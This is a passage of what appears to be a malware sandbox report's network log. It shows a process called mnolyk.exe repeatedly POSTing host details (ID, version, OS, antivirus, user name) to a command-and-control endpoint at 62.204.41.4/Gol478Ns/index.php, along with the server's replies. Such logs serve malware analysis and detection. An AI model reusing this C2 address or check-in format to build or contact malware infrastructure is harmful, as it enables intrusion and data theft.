                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:14.938288927 CET660INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:14 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          506192.168.2.65023162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:15.107613087 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:15.171725035 CET661INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          507192.168.2.65023262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:15.344050884 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:15.407577991 CET662INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          508192.168.2.65023362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:15.578131914 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:15.644202948 CET663INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          509192.168.2.65023462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:15.828144073 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:15.892023087 CET664INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:15 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          51192.168.2.64977062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:03.285970926 CET164OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:03.349364042 CET164INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          510192.168.2.65023562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:16.065618992 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:16.132009029 CET665INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          511192.168.2.65023662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:16.324345112 CET666OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:16.389148951 CET666INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          512192.168.2.65023762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:16.563327074 CET667OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:16.627619982 CET667INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          513192.168.2.65023862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:16.812391996 CET668OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:16.876820087 CET668INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:16 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          514192.168.2.65023962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:17.051311016 CET669OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:17.116439104 CET669INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          515192.168.2.65024062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:17.295969963 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:17.359875917 CET670INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          516192.168.2.65024162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:17.535341024 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:17.598932981 CET671INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          517192.168.2.65024262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:17.764358997 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:17.827296972 CET672INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:17 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          518192.168.2.65024362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:17.999929905 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:18.065951109 CET673INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          519192.168.2.65024462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:18.251405001 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:18.314459085 CET674INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          52192.168.2.64977162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:03.532617092 CET165OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:03.595849991 CET165INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          520192.168.2.65024562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:18.483828068 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:18.548212051 CET675INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          521192.168.2.65024662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:18.721407890 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:18.785443068 CET676INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:18 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          522192.168.2.65024762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:18.979917049 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:19.043632984 CET677INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          523192.168.2.65024862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:19.236085892 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:19.300606012 CET678INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:19 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          524192.168.2.65024962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:19.487023115 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
